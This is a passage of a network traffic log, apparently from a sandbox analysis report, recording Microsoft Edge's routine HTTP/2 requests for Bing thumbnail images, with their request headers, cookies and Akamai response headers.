akamai-grn: 0.b6777b5c.1729199025.9b4393f
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.b4a40212-560b-4e49-a115-50716e96c1fa&w=32&h=32&o=6&pid=AdsPlus

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.b4a40212-560b-4e49-a115-50716e96c1fa&w=32&h=32&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1822
cache-control: public, max-age=1963425
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43939
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.9c6126db-0240-4a40-983b-03c789b115b6&w=20&h=20&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.9c6126db-0240-4a40-983b-03c789b115b6&w=20&h=20&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1404
x-check-cacheable: YES
cache-control: public, max-age=1263547
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43938
GET

https://th.bing.com/th?id=ODLS.769bf555-7283-4315-913e-fcb5b346b32a&w=20&h=20&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.769bf555-7283-4315-913e-fcb5b346b32a&w=20&h=20&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 550
x-check-cacheable: YES
cache-control: public, max-age=816749
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43934
GET

https://th.bing.com/th?id=OSK.a2b0b9db1b0ecbec280ebf6b2f082af0&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.a2b0b9db1b0ecbec280ebf6b2f082af0&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 977
x-check-cacheable: YES
cache-control: public, max-age=2224530
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b4393a
GET

https://th.bing.com/th?id=OSK.f61d5e24b78d16ddc943170b8fc16e54&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.f61d5e24b78d16ddc943170b8fc16e54&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1820
x-check-cacheable: YES
cache-control: public, max-age=1870730
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43940
GET

https://th.bing.com/th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1025
cache-control: public, max-age=1209588
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43933
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1907
cache-control: public, max-age=1209552
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43937
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.2b33daf5d7cd303bff40b038dbd9a198&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.2b33daf5d7cd303bff40b038dbd9a198&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1966
cache-control: public, max-age=1209586
date: Thu, 17 Oct 2024 21:03:45 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199025.9b43935
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODL.032549a578d2ec61f9e3386bc626d011&w=115&h=87&c=10&rs=1&qlt=99&o=6&pid=13.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODL.032549a578d2ec61f9e3386bc626d011&w=115&h=87&c=10&rs=1&qlt=99&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
